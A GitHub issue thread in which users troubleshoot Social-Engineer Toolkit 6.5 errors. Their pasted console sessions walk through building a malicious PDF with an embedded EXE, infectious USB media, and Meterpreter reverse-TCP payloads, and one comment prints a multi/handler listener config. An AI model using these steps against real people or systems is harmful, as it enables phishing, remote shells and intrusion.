trustedsec
commented
8 years ago Which attack vector are you using for this? Can you paste the output from start to finish so I can troubleshoot?
Thanks!
-Dave
Closed th0m1 closed 8 years ago
trustedsec
commented
8 years ago Which attack vector are you using for this? Can you paste the output from start to finish so I can troubleshoot?
Thanks!
-Dave
th0m1
commented
8 years ago _______________________________
/ _____/\_ _____/\__ ___/
\_____ \ | __)_ | |
/ \ | \ | |
/_______ //_______ / |____|
\/ \/ [---] The Social-Engineer Toolkit (SET) [---] [---] Created by: David Kennedy (ReL1K) [---] [---] Version: 6.5 [---] [---] Codename: 'Mr. Robot' [---] [---] Follow us on Twitter: @TrustedSec [---] [---] Follow me on Twitter: @HackingDave [---] [---] Homepage: https://www.trustedsec.com [---]
Welcome to the Social-Engineer Toolkit (SET).
The one stop shop for all of your SE needs.
Join us on irc.freenode.net in channel #setoolkitThe Social-Engineer Toolkit is a product of TrustedSec.
Visit: https://www.trustedsec.comSelect from the menu:
1) Spear-Phishing Attack Vectors 2) Website Attack Vectors 3) Infectious Media Generator 4) Create a Payload and Listener 5) Mass Mailer Attack 6) Arduino-Based Attack Vector 7) Wireless Access Point Attack Vector 8) QRCode Generator Attack Vector 9) Powershell Attack Vectors 10) Third Party Modules
99) Return back to the main menu.
set> 1
The Spearphishing module allows you to specially craft email messages and send them to a large (or small) number of people with attached fileformat malicious payloads. If you want to spoof your email address, be sure "Sendmail" is in- stalled (apt-get install sendmail) and change the config/set_config SENDMAIL=OFF flag to SENDMAIL=ON.
There are two options, one is getting your feet wet and letting SET do everything for you (option 1), the second is to create your own FileFormat payload and use it in your own attack. Either way, good luck and enjoy!
1) Perform a Mass Email Attack 2) Create a FileFormat Payload 3) Create a Social-Engineering Template
99) Return to Main Menu
set:phishing>2
Select the file format exploit you want. The default is the PDF embedded EXE.
********** PAYLOADS **********1) SET Custom Written DLL Hijacking Attack Vector (RAR, ZIP) 2) SET Custom Written Document UNC LM SMB Capture Attack 3) MS14-017 Microsoft Word RTF Object Confusion (2014-04-01) 4) Microsoft Windows CreateSizedDIBSECTION Stack Buffer Overflow 5) Microsoft Word RTF pFragments Stack Buffer Overflow (MS10-087) 6) Adobe Flash Player "Button" Remote Code Execution 7) Adobe CoolType SING Table "uniqueName" Overflow 8) Adobe Flash Player "newfunction" Invalid Pointer Use 9) Adobe Collab.collectEmailInfo Buffer Overflow 10) Adobe Collab.getIcon Buffer Overflow 11) Adobe JBIG2Decode Memory Corruption Exploit 12) Adobe PDF Embedded EXE Social Engineering 13) Adobe util.printf() Buffer Overflow 14) Custom EXE to VBA (sent via RAR) (RAR required) 15) Adobe U3D CLODProgressiveMeshDeclaration Array Overrun 16) Adobe PDF Embedded EXE Social Engineering (NOJS) 17) Foxit PDF Reader v4.1.1 Title Stack Buffer Overflow 18) Apple QuickTime PICT PnSize Buffer Overflow 19) Nuance PDF Reader v6.0 Launch Stack Buffer Overflow 20) Adobe Reader u3D Memory Corruption Vulnerability 21) MSCOMCTL ActiveX Buffer Overflow (ms12-027)
set:payloads>12
[-] Default payload creation selected. SET will generate a normal PDF with embedded EXE.
1. Use your own PDF for attack
2. Use built-in BLANK PDF for attackset:payloads>2
1) Windows Reverse TCP Shell Spawn a command shell on victim and send back to attacker 2) Windows Meterpreter Reverse_TCP Spawn a meterpreter shell on victim and send back to attacker 3) Windows Reverse VNC DLL Spawn a VNC server on victim and send back to attacker 4) Windows Reverse TCP Shell (x64) Windows X64 Command Shell, Reverse TCP Inline 5) Windows Meterpreter Reverse_TCP (X64) Connect back to the attacker (Windows x64), Meterpreter 6) Windows Shell Bind_TCP (X64) Execute payload and create an accepting port on remote system 7) Windows Meterpreter Reverse HTTPS Tunnel communication over HTTP using SSL and use Meterpreter
set:payloads>2 set> IP address for the payload listener (LHOST): 192.168.1.79 set:payloads> Port to connect back on [443]:443 [-] Generating fileformat exploit... [] Payload creation complete. [] All payloads get sent to the /root/.set/template.pdf directory [-] As an added bonus, use the file-format creator in SET to create your attachment. No previous payload created. set:phishing> Enter the file to use as an attachment: [!] ERROR:FILE NOT FOUND. Try Again. set:phishing> Enter the file to use as an attachment:
i didn't found the file
th0m1
commented
8 years ago set>
!\_________________________/!\
!! !! \
!! Social-Engineer Toolkit !! \
!! !! !
!! Free !! !
!! !! !
!! #hugs !! !
!! !! !
!! By: TrustedSec !! /
!!_________________________!! /
!/_________________________\!/
__\_________________/__/!_
!_______________________!/
________________________
/oooo oooo oooo oooo /!
/ooooooooooooooooooooooo/ /
/ooooooooooooooooooooooo/ /
/C=_____________________/_/[---] The Social-Engineer Toolkit (SET) [---] [---] Created by: David Kennedy (ReL1K) [---] [---] Version: 6.5 [---] [---] Codename: 'Mr. Robot' [---] [---] Follow us on Twitter: @TrustedSec [---] [---] Follow me on Twitter: @HackingDave [---] [---] Homepage: https://www.trustedsec.com [---]
Welcome to the Social-Engineer Toolkit (SET).
The one stop shop for all of your SE needs.
Join us on irc.freenode.net in channel #setoolkitThe Social-Engineer Toolkit is a product of TrustedSec.
Visit: https://www.trustedsec.comSelect from the menu:
1) Spear-Phishing Attack Vectors 2) Website Attack Vectors 3) Infectious Media Generator 4) Create a Payload and Listener 5) Mass Mailer Attack 6) Arduino-Based Attack Vector 7) Wireless Access Point Attack Vector 8) QRCode Generator Attack Vector 9) Powershell Attack Vectors 10) Third Party Modules
99) Return back to the main menu.
set> 3
The Infectious USB/CD/DVD module will create an autorun.inf file and a Metasploit payload. When the DVD/USB/CD is inserted, it will automatically run if autorun is enabled.
Pick the attack vector you wish to use: fileformat bugs or a straight executable.
1) File-Format Exploits 2) Standard Metasploit Executable
99) Return to Main Menu
set:infectious>1 set:infectious> IP address for the reverse connection (payload):192.168.1.79
Select the file format exploit you want. The default is the PDF embedded EXE.
********** PAYLOADS **********1) SET Custom Written DLL Hijacking Attack Vector (RAR, ZIP) 2) SET Custom Written Document UNC LM SMB Capture Attack 3) MS14-017 Microsoft Word RTF Object Confusion (2014-04-01) 4) Microsoft Windows CreateSizedDIBSECTION Stack Buffer Overflow 5) Microsoft Word RTF pFragments Stack Buffer Overflow (MS10-087) 6) Adobe Flash Player "Button" Remote Code Execution 7) Adobe CoolType SING Table "uniqueName" Overflow 8) Adobe Flash Player "newfunction" Invalid Pointer Use 9) Adobe Collab.collectEmailInfo Buffer Overflow 10) Adobe Collab.getIcon Buffer Overflow 11) Adobe JBIG2Decode Memory Corruption Exploit 12) Adobe PDF Embedded EXE Social Engineering 13) Adobe util.printf() Buffer Overflow 14) Custom EXE to VBA (sent via RAR) (RAR required) 15) Adobe U3D CLODProgressiveMeshDeclaration Array Overrun 16) Adobe PDF Embedded EXE Social Engineering (NOJS) 17) Foxit PDF Reader v4.1.1 Title Stack Buffer Overflow 18) Apple QuickTime PICT PnSize Buffer Overflow 19) Nuance PDF Reader v6.0 Launch Stack Buffer Overflow 20) Adobe Reader u3D Memory Corruption Vulnerability 21) MSCOMCTL ActiveX Buffer Overflow (ms12-027)
set:payloads>12
[-] Default payload creation selected. SET will generate a normal PDF with embedded EXE.
1. Use your own PDF for attack
2. Use built-in BLANK PDF for attackset:payloads>2
1) Windows Reverse TCP Shell Spawn a command shell on victim and send back to attacker 2) Windows Meterpreter Reverse_TCP Spawn a meterpreter shell on victim and send back to attacker 3) Windows Reverse VNC DLL Spawn a VNC server on victim and send back to attacker 4) Windows Reverse TCP Shell (x64) Windows X64 Command Shell, Reverse TCP Inline 5) Windows Meterpreter Reverse_TCP (X64) Connect back to the attacker (Windows x64), Meterpreter 6) Windows Shell Bind_TCP (X64) Execute payload and create an accepting port on remote system 7) Windows Meterpreter Reverse HTTPS Tunnel communication over HTTP using SSL and use Meterpreter
set:payloads>2 set> IP address for the payload listener (LHOST): 192.168.1.79 set:payloads> Port to connect back on [443]:443 [-] Generating fileformat exploit... [] Payload creation complete. [] All payloads get sent to the /root/.set/template.pdf directory
[!] Something went wrong, printing the error: name 'src' is not defined
th0m1
commented
8 years ago also msfconsole can't find /root/.set/meta_config which i found manually
[---] The Social-Engineer Toolkit (SET) [---] [---] Created by: David Kennedy (ReL1K) [---] [---] Version: 6.5 [---] [---] Codename: 'Mr. Robot' [---] [---] Follow us on Twitter: @TrustedSec [---] [---] Follow me on Twitter: @HackingDave [---] [---] Homepage: https://www.trustedsec.com [---]
Welcome to the Social-Engineer Toolkit (SET).
The one stop shop for all of your SE needs.
Join us on irc.freenode.net in channel #setoolkitThe Social-Engineer Toolkit is a product of TrustedSec.
Visit: https://www.trustedsec.comSelect from the menu:
1) Spear-Phishing Attack Vectors 2) Website Attack Vectors 3) Infectious Media Generator 4) Create a Payload and Listener 5) Mass Mailer Attack 6) Arduino-Based Attack Vector 7) Wireless Access Point Attack Vector 8) QRCode Generator Attack Vector 9) Powershell Attack Vectors 10) Third Party Modules
99) Return back to the main menu.
set> 4
1) Windows Shell Reverse_TCP Spawn a command shell on victim and send back to attacker 2) Windows Reverse_TCP Meterpreter Spawn a meterpreter shell on victim and send back to attacker 3) Windows Reverse_TCP VNC DLL Spawn a VNC server on victim and send back to attacker 4) Windows Shell Reverse_TCP X64 Windows X64 Command Shell, Reverse TCP Inline 5) Windows Meterpreter Reverse_TCP X64 Connect back to the attacker (Windows x64), Meterpreter 6) Windows Meterpreter Egress Buster Spawn a meterpreter shell and find a port home via multiple ports 7) Windows Meterpreter Reverse HTTPS Tunnel communication over HTTP using SSL and use Meterpreter 8) Windows Meterpreter Reverse DNS Use a hostname instead of an IP address and use Reverse Meterpreter 9) Download/Run your Own Executable Downloads an executable and runs it
set:payloads>2 set:payloads> IP address for the payload listener (LHOST):192.168.1.79 set:payloads> Enter the PORT for the reverse listener:443 [] Generating the payload.. please be patient. [] Payload has been exported to the default SET directory located under: /root/.set/payload.exe set:payloads> Do you want to start the payload and listener now? (yes/no):yes [*] Launching msfconsole, this could take a few to load. Be patient...
| | | METASPLOIT CYBER MISSILE COMMAND V4 | |__| \ / / \ . / / x \ / / \ / + / \ + / / * / / / . / X / / X / ### / # % # / ### . / . / . * . / *
^################################################################################ ################################################################################
################################################################################ http://metasploit.pro
Trouble managing data? List, sort, group, tag and search your pentest data in Metasploit Pro -- learn more on http://rapid7.com/metasploit
=[ metasploit v4.11.4-2015071402 ][-] Cannot find resource script: /root/.set/meta_config msf >
doubledareyou
commented
8 years ago I'm having the same issue when selecting Spear-Phishing Attack Vectors > Perform a Mass Email Attack. "All payloads get sent to the /root/.set/template.pdf directory" followed by "No previous payload created".
I just installed Kali 2.0 - not sure if that's related to the issue or not. SET version 6.5
setoolkit
commented
8 years ago i also meet the same problem! i am so crazy for this problem. my setoolkit version is 5.6,what are you? if you solves the problem ,please tell we.thank you !
trustedsec
commented
8 years ago Thanks for posting this - this is due to removing msfcli from Metasploit. Currently rewriting to address. BTW you are all using an out of date version of SET. Current version is 6.5.3 - soon to be 6.5.4.
trustedsec
commented
8 years ago This is fixed in 6.5.4, should be released shortly. Thanks for the report!
seanhof
commented
8 years ago Hello. I just cloned the git repository so I'm running 6.5.4. When I try and generate a fileformat exploit with a PDF it never finishes after it says Generating fileformat exploit... Waiting for payload generation to complete... over and over without end.
I also get the error: [-] Cannot find resource script: /root/.set/meta_config msf >
When I try and create a payload and listener. I have verified that the file does exist. root@kali:~/.set# cat meta_config use multi/handler set payload windows/meterpreter/reverse_tcp set LHOST 10.0.2.15 set LPORT 443 set ExitOnSession false exploit -j
joshozilla
commented
8 years ago Same thing as seanhof.
[-] Cannot find resource script: /root/.set/meta_config msf >
still exists even when you update...
trustedsec
commented
8 years ago Can you let me know which options you were selecting from the menu so I can recreate?
joshozilla
commented
8 years ago 
Agentblank
firozmahamud29
blank37
chunonn
vahe662
pooyan1982
set:payloads> Port to connect back on [443]:443 [-] Generating fileformat exploit... [] Payload creation complete. [] All payloads get sent to the /root/.set/template.pdf directory [-] As an added bonus, use the file-format creator in SET to create your attachment. No previous payload created. set:phishing> Enter the file to use as an attachment:'/root/.set/payload.options' [!] ERROR:FILE NOT FOUND. Try Again.
i didn't find template.pdf also
[-] Generating fileformat exploit... [] Payload creation complete. [] All payloads get sent to the /root/.set/template.pdf directory
[!] Something went wrong, printing the error: name 'src' is not defined
i am using set toolkit version 6.5